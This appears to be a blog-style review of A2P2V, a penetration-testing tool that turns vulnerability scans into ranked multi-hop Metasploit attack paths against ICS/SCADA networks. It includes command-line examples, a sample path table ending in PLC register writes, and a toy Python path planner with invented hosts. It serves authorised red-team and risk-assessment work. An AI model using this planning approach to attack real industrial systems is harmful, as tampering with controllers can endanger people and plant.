A2P2V: Automating Attack Path Discovery from Vulnerability Scans to Metasploit Exploits

Hook

What if you could feed raw Nessus scans into a tool and get back a ranked list of multi-hop attack paths complete with ready-to-execute Metasploit commands? That’s exactly what A2P2V does, and it’s designed specifically for ICS/SCADA environments.

Context

Penetration testing typically involves a tedious manual process: scan the network with Nessus or Nmap, analyze vulnerability findings, cross-reference CVEs with available exploits in Metasploit, manually plan lateral movement paths, and finally execute attacks one hop at a time. For complex networks—especially industrial control systems with multiple network segments and interdependencies—this planning phase can consume days of expert time. Non-security stakeholders struggle to understand the risk when presented with raw vulnerability scan output.

A2P2V (Automated Attack Path Planning and Validation) was developed jointly by Toshiba Corporation and Peraton Labs to solve this specific problem. The tool automates the translation from passive vulnerability data to actionable attack sequences, generating ranked paths that show not just that a system is vulnerable, but exactly how an attacker could chain exploits to reach critical assets. This is particularly valuable in ICS/SCADA environments where understanding the full attack chain—from an internet-facing gateway through multiple network hops to a programmable logic controller—is essential for risk assessment and remediation prioritization.

Technical Insight

System architecture (auto-generated diagram; only the node labels survive extraction): the inputs are Network Topology XML, Vulnerability Data and Capability YAML. Capabilities are imported into a Capability Database as PAP Models (Pre-conditions, Exploit Action, Post-conditions). The Graph Planner combines those models with the Network state, performs Path Traversal and Path Scoring (rank by reliability) to generate Attack Trees and Ranked Paths, and the selected path's best sequences are executed through Metasploit RPC.

A2P2V’s architecture centers on a graph-based planning system that models network topology as nodes and exploits as edges. The key innovation is its use of PAP (Pre-condition, Action, Post-condition) modeling to describe exploit capabilities. Each capability in the system defines what must be true before an exploit can run (pre-conditions like “network access to port 445”), what the exploit does (action like “exploit/windows/smb/ms17_010_eternalblue”), and what new access or knowledge the attacker gains (post-conditions like “shell access on target”).

The workflow starts by loading capability definitions from YAML files. On first run, you import these definitions:

a2p2v --cpdb lab_config/capabilities_metasploit.yml

These capability files describe exploits in a machine-readable format that the planner can reason about. When you run A2P2V in planning mode against a network, it ingests your Nessus XML output, network topology XML, initial attacker position, and goal state. The planner then performs graph traversal to find all possible paths from your starting point to the goal, ranking them by a composite score based on path length and exploit reliability.

Running the planner looks like this:

a2p2v --plan

The output presents a table of attack trees showing the hop sequence and final capability needed:

TREE#|SCORE|HOPS                               |FINAL CAPABILITY OPTIONS                          |GOALS
-----|-----|-----------------------------------|--------------------------------------------------|--------------
    0| 6.24|GW(1)>HMI(4)>OPC(4)>PLC(1)         |action=WRITE_REGISTERS                            |change_temp
-----|-----|-----------------------------------|--------------------------------------------------|--------------
    1| 6.24|GW(1)>HMI(4)>EWS10(4)>PLC(1)       |action=WRITE_REGISTERS                            |change_temp

Each path shows not just the hosts to compromise, but the number of possible exploits at each hop (the numbers in parentheses). The system generates detailed reports in the reports/ directory showing the specific Metasploit commands needed to execute the selected path, complete with the proper options and payloads configured for each hop.

For simpler scenarios, A2P2V also supports single-host targeting. Point it at a specific target from your topology:

a2p2v --target USER1

The tool queries its capability database for all exploits applicable to that host’s vulnerabilities and presents them in a ranked list. You can execute individual exploits or all applicable ones. This mode is useful for validating that specific vulnerabilities are actually exploitable, not just theoretically present in scan results.

The integration with Metasploit happens through the RPC daemon. A2P2V does not just suggest exploits: it can execute the entire attack sequence automatically by connecting to msfrpcd (typically running in a Docker container on port 55552) and issuing the proper commands in sequence. This automation is powerful for red team exercises where you need to demonstrate full attack chains repeatably, but it requires careful scoping and authorization given the system's ability to execute real exploits. Treat the RPC endpoint itself as sensitive: anyone who can reach that port and authenticate can launch the same exploits, so bind msfrpcd to localhost or an isolated container network and give it a strong, non-default password.

The scoring algorithm balances multiple factors: shorter paths score higher (fewer opportunities for failure), exploits with higher reliability ratings score higher, and paths with more alternative options at each hop score higher (providing fallback if one exploit fails). This pragmatic scoring reflects real penetration testing priorities—you want the path most likely to succeed, not just any path that theoretically works.
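As an added example, the following Python models the PAP planning loop described above (capabilities as pre-condition/action/post-condition records, hosts as nodes, graph traversal from an initial foothold to a goal, a composite score) together with the single-host lookup of the target mode. It is not A2P2V's own code and does not reproduce its YAML schema or scoring formula; every host name, port, finding identifier and reliability value is constructed for the illustration, and the hop notation it prints mirrors the table shown earlier.

```python
"""Toy PAP-style attack path planner: added example, not A2P2V's own code.

Every host name, port, vulnerability id and reliability value below is
constructed for illustration; A2P2V's real YAML schema and scoring
formula are not reproduced here.
"""
from dataclasses import dataclass
from math import prod
from typing import Optional


@dataclass(frozen=True)
class Capability:
    """One PAP entry: pre-conditions (port + finding), action, post-condition (grants)."""
    action: str                # e.g. a Metasploit module path or a protocol action
    needs_port: int            # pre-condition: target must expose this port
    needs_vuln: Optional[str]  # pre-condition: scan must report this finding (None = not needed)
    grants: str                # post-condition: access gained ("shell", "write_registers", ...)
    reliability: float         # 0..1, assumed chance the exploit succeeds


# Constructed capability database (stands in for a capabilities YAML file).
CAPABILITIES = [
    Capability("exploit/unix/ssh/gw_rce", 22, "V-GW-1", "shell", 0.70),
    Capability("exploit/windows/smb/hmi_a", 445, "V-HMI-1", "shell", 0.90),
    Capability("exploit/windows/smb/hmi_b", 445, "V-HMI-2", "shell", 0.60),
    Capability("exploit/windows/dcerpc/opc", 135, "V-OPC-1", "shell", 0.80),
    Capability("action=WRITE_REGISTERS", 502, None, "write_registers", 0.95),
]

# Constructed network state: ports/findings as a scan would report them,
# links as a topology file would describe reachability between segments.
NETWORK = {
    "GW":    {"ports": {22},       "vulns": {"V-GW-1"},             "links": {"HMI"}},
    "HMI":   {"ports": {445},      "vulns": {"V-HMI-1", "V-HMI-2"}, "links": {"OPC", "EWS10"}},
    "OPC":   {"ports": {135, 445}, "vulns": {"V-OPC-1"},            "links": {"PLC"}},
    "EWS10": {"ports": {445},      "vulns": {"V-HMI-1"},            "links": {"PLC"}},
    "PLC":   {"ports": {502},      "vulns": set(),                  "links": set()},
}


def applicable(host: str, grants: Optional[str] = None) -> list:
    """Single-host mode: capabilities whose pre-conditions `host` satisfies, best first."""
    h = NETWORK[host]
    hits = [c for c in CAPABILITIES
            if c.needs_port in h["ports"]
            and (c.needs_vuln is None or c.needs_vuln in h["vulns"])
            and (grants is None or c.grants == grants)]
    return sorted(hits, key=lambda c: c.reliability, reverse=True)


def plan(start: str, goal_host: str, goal_grant: str) -> list:
    """Enumerate loop-free attack trees from `start` to `goal_host`.

    A tree is a list of (host, options) hops. Every intermediate hop must
    yield a shell, the post-condition that satisfies the next hop's network
    pre-condition; the final hop must yield `goal_grant`.
    """
    trees = []

    def walk(host, path):
        if host == goal_host:
            finals = applicable(host, goal_grant)
            if finals:
                trees.append(path + [(host, finals)])
            return
        shells = applicable(host, "shell")
        if not shells:
            return  # dead end: no foothold possible on this host
        visited = {h for h, _ in path} | {host}
        for nxt in sorted(NETWORK[host]["links"] - visited):
            walk(nxt, path + [(host, shells)])

    walk(start, [])
    return trees


def score(tree) -> float:
    """Illustrative composite score (not A2P2V's formula): per hop, the best
    reliability plus a small bonus for each fallback exploit, capped at 1.0,
    multiplied across hops, so an extra hop can never raise the score."""
    terms = [min(1.0, opts[0].reliability + 0.05 * (len(opts) - 1)) for _, opts in tree]
    return 10 * prod(terms)


def hops(tree) -> str:
    """Render a tree as GW(1)>HMI(2)>...>PLC(1): host followed by its option count."""
    return ">".join(f"{host}({len(opts)})" for host, opts in tree)


def ranked(start: str, goal_host: str, goal_grant: str) -> list:
    """(score, hops, final action) for every tree, best score first."""
    trees = plan(start, goal_host, goal_grant)
    return sorted(((score(t), hops(t), t[-1][1][0].action) for t in trees), reverse=True)


if __name__ == "__main__":
    print("TREE#|SCORE|HOPS                      |FINAL CAPABILITY")
    for i, (s, h, final) in enumerate(ranked("GW", "PLC", "write_registers")):
        print(f"{i:5}|{s:5.2f}|{h:26}|{final}")
```

The EWS10 route outranks the OPC route only because its one SMB exploit is rated more reliable than the OPC DCERPC exploit; change the reliability values or add a second option to OPC and the ranking flips, which is the behaviour the scoring description above predicts.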

Gotcha

A2P2V’s tight coupling to Metasploit is both a strength and a significant limitation. Your exploit coverage is restricted to what Metasploit supports, which means newer CVEs or specialized exploits not yet in Metasploit modules won’t be considered in attack planning. The tool also requires the Metasploit RPC daemon running, adding operational complexity and potential security concerns if not properly isolated.

The setup overhead is substantial. You need to manually create network topology XML files describing your environment's hosts and network connectivity. The README doesn't provide detailed format specifications for these XML files, forcing you to reverse-engineer the expected structure from examples. Similarly, while capability definitions are provided for Metasploit modules, extending the system with custom exploits or environment-specific attack techniques requires writing YAML definitions in the PAP format without comprehensive documentation on all available pre-condition and post-condition types. This makes A2P2V challenging to adapt for environments with custom applications or non-standard network architectures. The tool assumes you have time for careful preparation and configuration; it's not suited for rapid-response scenarios where you need to start testing immediately after arriving on-site.

Verdict

Use A2P2V if you’re conducting penetration tests on complex, multi-segment networks where understanding attack chains is more valuable than quickly exploiting individual vulnerabilities. It excels in ICS/SCADA environments, red team exercises requiring detailed planning and reporting, and scenarios where you need to communicate technical attack paths to non-security stakeholders through generated reports. The automated translation from vulnerability scans to executable attack sequences is genuinely time-saving once the initial setup is complete. Skip it if you need flexibility beyond Metasploit’s module set, lack time for environment configuration and topology mapping, prefer interactive exploitation workflows over automated sequences, or work primarily on simple network topologies where manual exploit chaining is straightforward. Also be aware that with 68 GitHub stars and copyright through 2023, community support may be limited and you may need to handle troubleshooting and extensions independently.
